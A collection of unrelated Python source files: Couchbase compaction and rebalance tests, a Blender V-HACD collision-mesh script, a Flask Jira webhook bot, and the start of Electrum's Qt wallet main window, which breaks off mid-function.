compaction_task = self.cluster.async_compact_bucket(self.master, self.default_bucket_name)
result = compaction_task.result(self.wait_timeout * 5)
self.assertTrue(result, "Compaction didn't finished correctly. Please check diags")
rebalance.result()
self.sleep(30)
self.verify_cluster_stats(self.servers[:self.nodes_in + 1])
def rebalance_in_with_auto_DB_compaction(self):
remote_client = RemoteMachineShellConnection(self.master)
rest = RestConnection(self.master)
self.set_auto_compaction(rest, dbFragmentThresholdPercentage=self.autocompaction_value)
self._load_all_buckets(self.master, self.gen_load, "create", 0, 1)
self._monitor_DB_fragmentation()
servs_in = self.servers[1:self.nodes_in + 1]
rebalance = self.cluster.async_rebalance([self.master], servs_in, [])
compact_run = remote_client.wait_till_compaction_end(rest, self.default_bucket_name,
timeout_in_seconds=(self.wait_timeout * 5))
rebalance.result()
self.sleep(30)
monitor_fragm = self.cluster.async_monitor_db_fragmentation(self.master, 0, self.default_bucket_name)
result = monitor_fragm.result()
if compact_run:
self.log.info("auto compaction run successfully")
elif result:
self.log.info("Compaction is already completed")
else:
self.fail("auto compaction does not run")
self.verify_cluster_stats(self.servers[:self.nodes_in + 1])
remote_client.disconnect()
def rebalance_out_with_DB_compaction(self):
self.log.info("create a cluster of all the available servers")
self.cluster.rebalance(self.servers[:self.num_servers],
self.servers[1:self.num_servers], [])
self.disable_compaction()
self._load_all_buckets(self.master, self.gen_load, "create", 0, 1)
self._monitor_DB_fragmentation()
servs_out = [self.servers[self.num_servers - i - 1] for i in range(self.nodes_out)]
rebalance = self.cluster.async_rebalance([self.master], [], servs_out)
compaction_task = self.cluster.async_compact_bucket(self.master, self.default_bucket_name)
result = compaction_task.result(self.wait_timeout * 5)
self.assertTrue(result, "Compaction didn't finished correctly. Please check diags")
rebalance.result()
self.sleep(30)
self.verify_cluster_stats(self.servers[:self.num_servers - self.nodes_out])
def rebalance_out_with_auto_DB_compaction(self):
remote_client = RemoteMachineShellConnection(self.master)
rest = RestConnection(self.master)
self.log.info("create a cluster of all the available servers")
self.cluster.rebalance(self.servers[:self.num_servers],
self.servers[1:self.num_servers], [])
self.set_auto_compaction(rest, dbFragmentThresholdPercentage=self.autocompaction_value)
self._load_all_buckets(self.master, self.gen_load, "create", 0, 1)
self._monitor_DB_fragmentation()
servs_out = [self.servers[self.num_servers - i - 1] for i in range(self.nodes_out)]
rebalance = self.cluster.async_rebalance([self.master], [], servs_out)
compact_run = remote_client.wait_till_compaction_end(rest, self.default_bucket_name,
timeout_in_seconds=(self.wait_timeout * 5))
rebalance.result()
self.sleep(30)
monitor_fragm = self.cluster.async_monitor_db_fragmentation(self.master, 0, self.default_bucket_name)
result = monitor_fragm.result()
if compact_run:
self.log.info("auto compaction run successfully")
elif result:
self.log.info("Compaction is already completed")
else:
self.fail("auto compaction does not run")
self.verify_cluster_stats(self.servers[:self.num_servers - self.nodes_out])
remote_client.disconnect()
def rebalance_in_out_with_DB_compaction(self):
self.assertTrue(self.num_servers > self.nodes_in + self.nodes_out,
"ERROR: Not enough nodes to do rebalance in and out")
servs_init = self.servers[:self.nodes_init]
servs_in = [self.servers[i + self.nodes_init] for i in range(self.nodes_in)]
servs_out = [self.servers[self.nodes_init - i - 1] for i in range(self.nodes_out)]
result_nodes = set(servs_init + servs_in) - set(servs_out)
self.disable_compaction()
self._load_all_buckets(self.master, self.gen_load, "create", 0, 1)
rebalance = self.cluster.async_rebalance(servs_init, servs_in, servs_out)
while rebalance.state != "FINISHED":
self._monitor_DB_fragmentation()
compaction_task = self.cluster.async_compact_bucket(self.master, self.default_bucket_name)
result = compaction_task.result(self.wait_timeout * 5)
self.assertTrue(result, "Compaction didn't finished correctly. Please check diags")
rebalance.result()
self.sleep(30)
self.verify_cluster_stats(result_nodes)
def rebalance_in_out_with_auto_DB_compaction(self):
remote_client = RemoteMachineShellConnection(self.master)
rest = RestConnection(self.master)
self.assertTrue(self.num_servers > self.nodes_in + self.nodes_out,
"ERROR: Not enough nodes to do rebalance in and out")
servs_init = self.servers[:self.nodes_init]
servs_in = [self.servers[i + self.nodes_init] for i in range(self.nodes_in)]
servs_out = [self.servers[self.nodes_init - i - 1] for i in range(self.nodes_out)]
result_nodes = set(servs_init + servs_in) - set(servs_out)
self.set_auto_compaction(rest, dbFragmentThresholdPercentage=self.autocompaction_value)
self._load_all_buckets(self.master, self.gen_load, "create", 0, 1)
rebalance = self.cluster.async_rebalance(servs_init, servs_in, servs_out)
while rebalance.state != "FINISHED":
self._monitor_DB_fragmentation()
compact_run = remote_client.wait_till_compaction_end(rest, self.default_bucket_name,
timeout_in_seconds=(self.wait_timeout * 5))
rebalance.result()
self.sleep(30)
monitor_fragm = self.cluster.async_monitor_db_fragmentation(self.master, 0, self.default_bucket_name)
result = monitor_fragm.result()
if compact_run:
self.log.info("auto compaction run successfully")
elif result:
self.log.info("Compaction is already completed")
else:
self.fail("auto compaction does not run")
self.verify_cluster_stats(result_nodes)
remote_client.disconnect()
def test_database_time_compaction(self):
remote_client = RemoteMachineShellConnection(self.master)
rest = RestConnection(self.master)
currTime = datetime.datetime.now()
fromTime = currTime + datetime.timedelta(hours=1)
toTime = currTime + datetime.timedelta(hours=10)
self.set_auto_compaction(rest, dbFragmentThresholdPercentage=self.autocompaction_value, allowedTimePeriodFromHour=fromTime.hour,
allowedTimePeriodFromMin=fromTime.minute, allowedTimePeriodToHour=toTime.hour, allowedTimePeriodToMin=toTime.minute,
allowedTimePeriodAbort="false")
self._load_all_buckets(self.master, self.gen_load, "create", 0, 1)
self._monitor_DB_fragmentation()
for i in range(10):
active_tasks = self.cluster.async_monitor_active_task(self.master, "bucket_compaction", "bucket", wait_task=False)
for active_task in active_tasks:
result = active_task.result()
self.assertTrue(result)
self.sleep(2)
currTime = datetime.datetime.now()
#Need to make it configurable
newTime = currTime + datetime.timedelta(minutes=5)
self.set_auto_compaction(rest, dbFragmentThresholdPercentage=self.autocompaction_value, allowedTimePeriodFromHour=currTime.hour,
allowedTimePeriodFromMin=currTime.minute, allowedTimePeriodToHour=newTime.hour, allowedTimePeriodToMin=newTime.minute,
allowedTimePeriodAbort="false")
compact_run = remote_client.wait_till_compaction_end(rest, self.default_bucket_name,
timeout_in_seconds=(self.wait_timeout * 5))
if compact_run:
self.log.info("auto compaction run successfully")
else:
self.fail("auto compaction does not run")
remote_client.disconnect()
def rebalance_in_with_DB_time_compaction(self):
remote_client = RemoteMachineShellConnection(self.master)
rest = RestConnection(self.master)
currTime = datetime.datetime.now()
fromTime = currTime + datetime.timedelta(hours=1)
toTime = currTime + datetime.timedelta(hours=24)
self.set_auto_compaction(rest, dbFragmentThresholdPercentage=self.autocompaction_value, allowedTimePeriodFromHour=fromTime.hour,
allowedTimePeriodFromMin=fromTime.minute, allowedTimePeriodToHour=toTime.hour, allowedTimePeriodToMin=toTime.minute,
allowedTimePeriodAbort="false")
self._load_all_buckets(self.master, self.gen_load, "create", 0, 1)
self._monitor_DB_fragmentation()
for i in range(10):
active_tasks = self.cluster.async_monitor_active_task(self.master, "bucket_compaction", "bucket", wait_task=False)
for active_task in active_tasks:
result = active_task.result()
self.assertTrue(result)
self.sleep(2)
currTime = datetime.datetime.now()
#Need to make it configurable
newTime = currTime + datetime.timedelta(minutes=5)
self.set_auto_compaction(rest, dbFragmentThresholdPercentage=self.autocompaction_value, allowedTimePeriodFromHour=currTime.hour,
allowedTimePeriodFromMin=currTime.minute, allowedTimePeriodToHour=newTime.hour, allowedTimePeriodToMin=newTime.minute,
allowedTimePeriodAbort="false")
servs_in = self.servers[self.nodes_init:self.nodes_in + 1]
rebalance = self.cluster.async_rebalance([self.master], servs_in, [])
compact_run = remote_client.wait_till_compaction_end(rest, self.default_bucket_name,
timeout_in_seconds=(self.wait_timeout * 5))
rebalance.result()
if compact_run:
self.log.info("auto compaction run successfully")
else:
self.fail("auto compaction does not run")
remote_client.disconnect()
def test_database_size_compaction(self):
rest = RestConnection(self.master)
percent_threshold = self.autocompaction_value * 1048576
self.set_auto_compaction(rest, dbFragmentThreshold=percent_threshold)
self._load_all_buckets(self.master, self.gen_load, "create", 0, 1)
end_time = time.time() + self.wait_timeout * 5
monitor_fragm = self.cluster.async_monitor_disk_size_fragmentation(self.master, percent_threshold, self.default_bucket_name)
while monitor_fragm.state != "FINISHED":
if end_time < time.time():
self.fail("Fragmentation level is not reached in %s sec" % self.wait_timeout * 5)
try:
monitor_fragm = self.cluster.async_monitor_disk_size_fragmentation(self.master, percent_threshold, self.default_bucket_name)
self._load_all_buckets(self.master, self.gen_update, "update", 0)
active_tasks = self.cluster.async_monitor_active_task(self.master, "bucket_compaction", "bucket", wait_task=False)
for active_task in active_tasks:
result = active_task.result()
self.assertTrue(result)
self.sleep(2)
except Exception as ex:
self.log.error("Load cannot be performed: %s" % str(ex))
self.fail(ex)
monitor_fragm.result()
def test_start_stop_DB_compaction(self):
rest = RestConnection(self.master)
remote_client = RemoteMachineShellConnection(self.master)
self.log.info('loading the buckets')
self._load_all_buckets(self.master, self.gen_load, "create", 0, 1)
self.log.info('disabling compaction')
self.disable_compaction()
self.log.info('monitor db fragmentation')
self._monitor_DB_fragmentation()
self.log.info('async compact the bucket')
compaction_task = self.cluster.async_compact_bucket(self.master, self.default_bucket_name)
self.log.info('cancel bucket compaction')
self._cancel_bucket_compaction(rest, self.default_bucket_name)
#compaction_task.result(self.wait_timeout)
self.log.info('compact again')
self.cluster.async_compact_bucket(self.master, self.default_bucket_name)
self.log.info('waiting for compaction to end')
compact_run = remote_client.wait_till_compaction_end(rest, self.default_bucket_name, timeout_in_seconds=self.wait_timeout)
if compact_run:
self.log.info("auto compaction run successfully")
else:
self.fail("auto compaction does not run")
remote_client.disconnect()
# Created for MB-14976 - we need more than 65536 file revisions to trigger this problem.
def test_large_file_version(self):
rest = RestConnection(self.master)
remote_client = RemoteMachineShellConnection(self.master)
remote_client.extract_remote_info()
self._load_all_buckets(self.master, self.gen_load, "create", 0, 1)
self.disable_compaction()
self._monitor_DB_fragmentation()
# rename here
remote_client.stop_couchbase()
time.sleep(5)
remote_client.execute_command("cd /opt/couchbase/var/lib/couchbase/data/default;rename .1 .65535 *.1")
remote_client.execute_command("cd /opt/couchbase/var/lib/couchbase/data/default;rename .2 .65535 *.2")
remote_client.start_couchbase()
for i in range(5):
self.log.info("starting a compaction iteration")
compaction_task = self.cluster.async_compact_bucket(self.master, self.default_bucket_name)
compact_run = remote_client.wait_till_compaction_end(rest, self.default_bucket_name, timeout_in_seconds=self.wait_timeout)
res = compaction_task.result(self.wait_timeout)
if compact_run:
self.log.info("auto compaction run successfully")
else:
self.fail("auto compaction does not run")
remote_client.disconnect()
def test_start_stop_auto_DB_compaction(self):
threads = []
rest = RestConnection(self.master)
self.set_auto_compaction(rest, dbFragmentThresholdPercentage=self.autocompaction_value)
self._load_all_buckets(self.master, self.gen_load, "create", 0, 1)
threads.append(Thread(target=self._monitor_DB_fragmentation, name="DB_Thread", args=()))
threads.append(Thread(target=self._cancel_bucket_compaction, name="cancel_Thread", args=(rest, self.default_bucket_name,)))
for thread in threads:
thread.start()
self.sleep(2)
for thread in threads:
thread.join()
if self.is_crashed.is_set():
self.fail("Error occurred during test run")
def _cancel_bucket_compaction(self, rest, bucket):
remote_client = RemoteMachineShellConnection(self.master)
try:
result = self.cluster.cancel_bucket_compaction(self.master, bucket)
self.assertTrue(result)
remote_client.wait_till_compaction_end(rest, self.default_bucket_name, self.wait_timeout)
compaction_running = False
except Exception as ex:
self.is_crashed.set()
self.log.error("Compaction cannot be cancelled: %s" % str(ex))
remote_client.disconnect()
def test_auto_compaction_with_multiple_buckets(self):
remote_client = RemoteMachineShellConnection(self.master)
rest = RestConnection(self.master)
for bucket in self.buckets:
if bucket.name == "default":
self.disable_compaction()
else:
self.set_auto_compaction(rest, dbFragmentThresholdPercentage=self.autocompaction_value, bucket=bucket.name)
self._load_all_buckets(self.master, self.gen_load, "create", 0, 1)
end_time = time.time() + self.wait_timeout * 30
for bucket in self.buckets:
monitor_fragm = self.cluster.async_monitor_db_fragmentation(self.master, self.autocompaction_value, bucket.name)
while monitor_fragm.state != "FINISHED":
if end_time < time.time():
self.fail("Fragmentation level is not reached in %s sec" % self.wait_timeout * 30)
try:
self._load_all_buckets(self.servers[0], self.gen_update, "update", 0)
except Exception as ex:
self.log.error("Load cannot be performed: %s" % str(ex))
self.fail(ex)
monitor_fragm.result()
compact_run = remote_client.wait_till_compaction_end(rest, bucket.name,
timeout_in_seconds=(self.wait_timeout * 5))
if compact_run:
self.log.info("auto compaction run successfully")
remote_client.disconnect()
def _monitor_DB_fragmentation(self):
monitor_fragm = self.cluster.async_monitor_db_fragmentation(self.master, self.autocompaction_value, self.default_bucket_name)
end_time = time.time() + self.wait_timeout * 30
while monitor_fragm.state != "FINISHED":
if end_time < time.time():
self.fail("Fragmentation level is not reached in %s sec" % self.wait_timeout * 30)
try:
self._load_all_buckets(self.master, self.gen_update, "update", 0)
except Exception as ex:
self.is_crashed.set()
self.log.error("Load cannot be performed: %s" % str(ex))
self.fail(ex)
result = monitor_fragm.result()
if not result:
self.is_crashed.set()
self.assertTrue(result, "Fragmentation level is not reached")
|
step_2_collision_mesh.py
|
import os
import subprocess
import argparse
import threading
NUM_THREADS = 32
parser = argparse.ArgumentParser('gen all vhacd')
parser.add_argument('--object_name', dest='object_name')
parser.add_argument('--input_dir', dest='input_dir')
parser.add_argument('--output_dir', dest='output_dir')
parser.add_argument('--split_loose', dest='split_merge',
action='store_true')
args = parser.parse_args()
if not os.path.isdir(args.input_dir):
raise ValueError('Input directory not found: {}'.format(args.input_dir))
quit()
os.makedirs(args.output_dir, exist_ok=True)
script_dir = os.path.dirname(os.path.abspath(__file__))
if args.split_merge:
tmp_dir = os.path.join(args.output_dir, 'tmp', 'split')
os.makedirs(tmp_dir, exist_ok=True)
########################
# split to loose parts #
########################
cmd = 'cd {} && blender -b --python step_2_split.py -- {} {}'.format(
script_dir, args.input_dir, tmp_dir)
subprocess.call(cmd, shell=True,
stdout=subprocess.DEVNULL)
input_dir = tmp_dir
else:
input_dir = args.input_dir
tmp_dir = os.path.join(args.output_dir, 'tmp', 'vhacd')
os.makedirs(tmp_dir, exist_ok=True)
objs = [o for o in os.listdir(input_dir) if os.path.splitext(o)[1] == '.obj']
print('Inititating V-HACD for {} meshes...'.format(len(objs)))
def vhacd(cmd):
subprocess.call(cmd, shell=True,
stdout=subprocess.DEVNULL)
threads = []
for o in objs:
in_f = os.path.join(input_dir, o)
out_f = os.path.join(tmp_dir, o)
cmd = '../../blender_utils/vhacd --input {} --output {}'.format(in_f, out_f)
thread = threading.Thread(target=vhacd, args=(cmd,))
thread.start()
threads.append(thread)
print('Waiting for finishing...')
for thread in threads:
thread.join()
print('Merging V-HACD...')
###########################
# Merge all V-HACD to one #
###########################
cmd = 'cd {} && blender -b --python step_2_merge.py -- {} {} {}'.format(
script_dir, args.object_name, tmp_dir, args.output_dir)
subprocess.call(cmd, shell=True,
stdout=subprocess.DEVNULL)
tmp_dir = os.path.join(args.output_dir, 'tmp')
cmd = 'rm -r {}'.format(tmp_dir)
subprocess.call(cmd, shell=True)
|
app.py
|
import flask
import json
import queue
import threading
from jira.issues import issue_event
from jira.sprints import sprint_event, scheduler
app = flask.Flask(__name__)
q = queue.Queue()
def handle_webhook_from_q():
while True:
data = q.get()
if data == 'shutdown':
break
issue = data.get('issue')
if issue:
issue_event(issue)
sprint = data.get('sprint')
if sprint:
sprint_event(sprint)
threading.Thread(target=handle_webhook_from_q, daemon=True).start()
threading.Thread(target=scheduler, daemon=True).start()
@app.route('/', methods=['POST', 'GET'])
def webhook():
if flask.request.method == 'POST':
data = json.loads(flask.request.data.decode())
q.put(data)
return 'OK'
return 'JackBot is running!'
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import webbrowser
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from PyQt5.QtGui import *
from PyQt5.QtCore import *
import PyQt5.QtCore as QtCore
from PyQt5.QtWidgets import *
import electrum
from electrum import (keystore, simple_config, ecc, constants, util, bitcoin, commands,
coinchooser, paymentrequest)
from electrum.bitcoin import COIN, is_address, TYPE_ADDRESS
from electrum.plugin import run_hook
from electrum.i18n import _
from electrum.util import (format_time, format_satoshis, format_fee_satoshis,
format_satoshis_plain, NotEnoughFunds, PrintError,
UserCancelled, NoDynamicFeeEstimates, profiler,
export_meta, import_meta, bh2u, bfh, InvalidPassword,
base_units, base_units_list, base_unit_name_to_decimal_point,
decimal_point_to_base_unit_name, quantize_feerate,
UnknownBaseUnit, DECIMAL_POINT_DEFAULT, UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter)
from electrum.transaction import Transaction, TxOutput
from electrum.address_synchronizer import AddTransactionException
from electrum.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption)
from electrum.version import ELECTRUM_VERSION
from electrum.network import Network
from electrum.exchange_rate import FxThread
from electrum.simple_config import SimpleConfig
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .util import *
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
self.setCursor(QCursor(Qt.PointingHandCursor))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
from electrum.paymentrequest import PR_PAID
class ElectrumWindow(QMainWindow, MessageBoxMixin, PrintError):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
new_fx_quotes_signal = pyqtSignal()
new_fx_history_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
def __init__(self, gui_object, wallet: Abstract_Wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config # type: SimpleConfig
self.gui_thread = gui_object.gui_thread
self.setup_exception_hook()
self.network = gui_object.daemon.network # type: Network
assert wallet, "no wallet"
self.wallet = wallet
self.fx = gui_object.daemon.fx # type: FxThread
self.invoices = wallet.invoices
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.is_max = False
self.payment_request = None
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.pluginsdialog = None
self.require_fee_update = False
self.tl_windows = []
self.tx_external_keypairs = {}
self.tx_notification_queue = queue.Queue()
self.tx_notification_last_time = 0
self.create_status_bar()
self.need_update = threading.Event()
self.decimal_point = config.get('decimal_point', DECIMAL_POINT_DEFAULT)
try:
decimal_point_to_base_unit_name(self.decimal_point)
except UnknownBaseUnit:
self.decimal_point = DECIMAL_POINT_DEFAULT
self.num_zeros = int(config.get('num_zeros', 0))
self.completions = QStringListModel()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
tabs.addTab(self.create_history_tab(), QIcon(":icons/tab_history.png"), _('History'))
tabs.addTab(self.send_tab, QIcon(":icons/tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, QIcon(":icons/tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, QIcon(":icons/tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.utxo_tab, QIcon(":icons/tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, QIcon(":icons/tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, QIcon(":icons/tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(QIcon(":icons/electrum.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("F5"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'new_transaction', 'status',
'banner', 'verified', 'fee', 'fee_histogram']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
self.new_fx_quotes_signal.connect(self.on_fx_quotes)
self.new_fx_history_signal.connect(self.on_fx_history)
# update fee slider in case we missed the callback
self.fee_slider.update()
self.load_wallet(wallet)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
def on_history(self, b):
self.wallet.clear_coin_price_cache()
self.new_fx_history_signal.emit()
def setup_exception_hook(self):
Exception_Hook(self)
def on_fx_history(self):
self.history_model.refresh('fx_history')
self.address_list.update()
def on_quotes(self, b):
self.new_fx_quotes_signal.emit()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_model.refresh('fx_quotes')
self.address_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide") if show else _("Show")) + " " + tab.tab_description
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
return "%s/%s" % (PrintError.diagnostic_name(self),
self.wallet.basename() if self.wallet else "None")
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
e = exc_info[1]
if isinstance(e, UserCancelled):
pass
elif isinstance(e, UserFacingException):
self.show_error(str(e))
else:
try:
traceback.print_exception(*exc_info)
except OSError:
pass # see #4418
self.show_error(str(e))
def on_network(self, event, *args):
if event == 'wallet_updated':
wallet = args[0]
if wallet == self.wallet:
self.need_update.set()
elif event == 'network_updated':
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
self.network_signal.emit('status', None)
elif event == 'blockchain_updated':
# to update number of confirmations in history
self.need_update.set()
elif event == 'new_transaction':
wallet, tx = args
if wallet == self.wallet:
self.tx_notification_queue.put(tx)
elif event in ['status', 'banner', 'verified', 'fee', 'fee_histogram']:
# Handle in GUI thread
self.network_signal.emit(event, args)
else:
self.print_error("unexpected network message:", event, args)
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
if event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
wallet, tx_hash, tx_mined_status = args
if wallet == self.wallet:
self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
elif event == 'fee':
if self.config.is_dynfee():
self.fee_slider.update()
self.do_update_fee()
elif event == 'fee_histogram':
if self.config.is_dynfee():
self.fee_slider.update()
self.do_update_fee()
self.history_model.on_fee_histogram()
else:
self.print_error("unexpected network_qt signal:", event, args)
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.print_error('close_wallet', self.wallet.storage.path)
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.update_recently_visited(wallet.storage.path)
self.need_update.set()
# Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.print_error("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum Testnet" if constants.net.TESTNET else "Electrum"
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Bitcoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Information'))
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
shutil.copy2(path, new_path)
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except BaseException as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
